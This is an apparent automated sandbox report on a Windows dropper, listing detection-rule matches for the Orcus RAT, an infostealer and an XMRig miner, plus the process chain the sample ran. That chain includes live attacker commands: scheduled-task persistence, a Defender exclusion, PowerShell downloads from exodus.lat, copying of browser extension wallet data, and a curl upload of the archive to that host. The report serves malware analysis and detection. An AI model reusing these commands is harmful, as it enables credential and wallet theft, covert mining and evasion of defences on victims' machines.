Source: DM6vAAgoCw.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
Source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTR | Matched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: smartscreen.exe.22.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: COMSurrogate.exe.38.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 22.2.RegAsm.exe.61d0000.10.raw.unpack, ArrayUtils.cs | Cryptographic APIs: 'TransformBlock'
Source: 22.2.RegAsm.exe.61d0000.10.raw.unpack, ArrayUtils.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 22.2.RegAsm.exe.5a40000.5.raw.unpack, CursorStreamCodec.cs | Task registration methods: 'CreateModifierTask'
Source: smartscreen.exe.22.dr, ClipboardMonitor.cs | Base64 encoded string: 'GAKQVYAYGOJEN2XJIYUYG24OGN64RXV2KN3UW3XUR6KUMENJ6YDM5TTG'
                                  Source: 22.2.RegAsm.exe.5130000.4.raw.unpack, KeyDatabase.csBase64 encoded string: 'LLRoXV86AlBeBo3gr4j5ksNz+rUdyxTAXD7SqpWJBBkxzSUyDEiVA+O9eBOsRNGM', 'OKwgx+ENIbgtqRVdHAQDNzVAljJosuOsQvegxi9iaRp8fU2QMtC33rhaMK+0L+ie', 'gx7soik3QiZs2ND2XzdSE75IEDI3Y20JdsJgP6hZpb9H41GxM/QlnbjCKXlj5K8P', 'uuesSDgbaTSX5NoGigaHLi/gX5RCdz9spyy0H8i6QxA20VrDqnlslUpGgdejo9sy', 'Uz7Q/c4M0rYzv5dXs8JL1z8vWgB1ZUqJm6fm5+wiveEOlA0/ScCnhhio22vyEs7G', 'OGKNd3DCifhKxKHVlfNnsriucooii76f7LVzTFbES8PKlDC0IlmtpjTlZAcmnPPj', 'X0CqsAN8xg8RLjduBT4HCyNGUhRlKEajE68/lRhcQLMyQi9KO93AmyZiDmge58hD', 'KzxkwLJWqc3A5NLwo/kqQyGjOHcNEtx1UfT/uLHBuAA59oAEuOBwJF1c+OkbBjwG', 'SvAd86CrtADibJP4DQi0J/VoqtdGTL1yNDhVoSMH+tIZi6OLgd+x7QXNQuz8erFO', 'XInNAzTkeNpo24AaPlUlT+Yz9NuB/kt1x031WByMVo+d9ftF9wS7WWBwIpH2+mxz', 'Qr/7AtbODKwRvK1+Zl4qJNVNplORdKbLvldxC8vDjbUcjK86qxHPaIokWi9HosYb', 'HRcYJIwZghvv/DHAHRj81a5v0kSmAoSZ+NB1q63ICxH57QAryYkmYvYw2F5oVzaz', 'v7mj41wpeahjU+PxfULc5x6EKMqktqzLg0Vj37hXr/MV/nPnu+dlru6ErMoF3o/J', 'wIx+ssCbqA6eFjol20RLaSA2HKHvBjTJic5dLMQBPdfjE5c646aV4gVtXpbdoFCx', 'uEIWQfHpHaUjgniOrw9ATEaDCCpvRR6uSCDZPN00dwHLWb+9pZJSkLkBUAiY5y4Q', 'Y5ytkJax0ay/eI3J6J/U4SbJ7cZmvZ0bffpcQjW+rwLOGpq4AtuBRZV7M3aBYE7F', 'XD1MIMwBM17D+Tmmi9LZ+DEhg2kZpxY1SmTyqv90lM+qgF+U5q5JXh05kqO8V170', 'JQafwmk8QA9GqijIahqYL/ISzOhmcUYXiNxQ80Pv6DI/cgq8Qd0E8BlZwd7X4f4C', 'pDRUjkDFFnKMacyoXf7IGPlDfOAYSGyjyOLWzK7Nmu3Id3TGR99dEQyC3g0b1Q0U', 'KacKd1h5i1mmRhJ5AlfVDXZMX77XCvO8AecWrLg9rZflhwBuLNeS7yxeygPaTMgl', 'UnNFCa+15bwu9haUERlOlwxpDI7DGKxz0vNDda3C6hf7n0muX/2YIDdOQqf8hfO2', 'KKppwnlOWmznL/8v6Fy1zVmdtGOw1hKaKtaOcgg1u9Ig8c6N4hhLMgYcGQqYrUJN', 'TnnQJTTI6Mcmi1/X3swqam0XaXWgTTvnkOShXaOcEztHPaB8f9z3T7cZPPEkBiyD', 'SAAuLX3l/wZJ1J3V0mFWqhzDVtMA2BhL8dZ4tV3ojemJdKFZUYbEJCBG8whhCYee', 'LjLuGByUVKa6V4KrQoDlHHpAHaqYI5P35/BcR4Z7kDClpGsL0dYG7E9meDfWnRju', 'hSXzzzybSgOYwDbkh0tbGHUB5fKieNOoULCZsPfPZ1EkMf3wmXzF2XPUPDdN5FVE', 'G5LGae6g7sOouwyMyendq4hFGTe9m94Riu8msKLXxUPHXeUb5BIH1ULNfn9d3ZGz', 
'sHHZnz5a+F35s0VENqJXHtlEDvHubuN36y+3NOeiaXvZ7pgC8Y84Aw2wF5n0bbt8', 'swx0nHzDyVuHHezsYZW/+rS9z9IKBnVvUIOIdaH/buVZ+quH7D/vqj7MN9Oj6D4J', '/DEeR4iP4I2G2hA9DQCekUGFbswgwn0ra9eMmFwsfQOi48wYXrhl78yieJQRuwdw', 'GW+pdpbEzDWJ6kgB+lig+R1i5HSDZYaoFLITlPVvZHsi9QyU32rEdM6OFDJvq2Vk', 'VJJ4za8d9HFKohFmSpvhdiSb44JNd5GAnTsyFX2jT+J3couTiGBfDEYiVT1jtOEn', 'WD88YgwKQ7UXIbWksOUPn5b5X+X/K+7p8jJFq4Exd5pqRo1/1dcOOUo6BXyYG6Z8', 'wl0yMQGTnLTmIcVs4TkWLVTM7YgpbwecQt3KcxN1sIuJv8eZnlbvb0n51dsXpvdn', 'hPm4vV7aw7i1Ss7hRMfs8WLRGxK8OAaAn/B1wXEEc2VqvVs+BFf6A9YGGNCK8Dxg', 'Gt3emW4XxKDllLyO7RhB2toJlr5kmtVsx1hxZ7fH11o6OhuAJvwsh/KXEzKGZPBQ', 'hTv/t6X3gx6UAxgi4wRuHp9PIZXYFIClnIz2hQYePtA9aL2HX9GTpU32Yi8RDg1x', 'pVV0CEPKllCk03vZKSfB0v2Taee5xNRkG/aHQ1wnXMEpof9qrRFEYbiBAZgXTwIO', 'ypaZWoqA/XRWYHsn1+7cJuY5YYt0cRBBWiKEg5KzhsnSZ7DAkAtLBsFBhyvH44md', 'rsu+ut+M6pTxLOeN7WwAWoNDzk65Yg0D7p1sPZvqMbFTWY5JPAh7MHoGQZkzifyh', 'XDZe0kBvd0EiI69cJlPNsKholDNzrFurqlV/mJujo4EdKRmHkdGR6F4i30fRpZjU', 'VKr2j3gn2d+CobbgXvtCKl4UdcNPBl1lePlYYoGZhYCI97i+e7oc6UoHEARAEMY1', 'puCUoUYp24GLuB8TKygEAToyvRqQL9IaHPutAEDPbF0OsniEl+TCdJh2H1nz89Rf', '/su7PIEOzM1ch1yvca4Sl3vMMfquA9RIMrIRv3I2gw7+llVbcy/xU5iiTbhGjlh8', 'PetZ5Lw
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@93/67@0/4
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0069A6AD GetLastError,FormatMessageW,18_2_0069A6AD
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00688DE9 AdjustTokenPrivileges,CloseHandle,18_2_00688DE9
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00689399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_00689399
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00694148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,18_2_00694148
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0069443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,18_2_0069443D
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | File created: C:\Users\user\AppData\Local\CreativePixel Tech
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\7a9c0f279c464958aebbd585f20f1cf2
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | File created: C:\Users\user\AppData\Local\Temp\nsf18B.tmp
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
Source: DM6vAAgoCw.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * FROM WIN32_Processor
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DM6vAAgoCw.exe | ReversingLabs: Detection: 31%
Source: DM6vAAgoCw.exe | Virustotal: Detection: 30%
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | File read: C:\Users\user\Desktop\DM6vAAgoCw.exe
Source: unknown | Process created: C:\Users\user\Desktop\DM6vAAgoCw.exe "C:\Users\user\Desktop\DM6vAAgoCw.exe"
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 491505
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\491505\Dr.com Dr.com B
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s https://api.ipify.org
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
Source: unknown | Process created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 491505
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\491505\Dr.com Dr.com B
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "
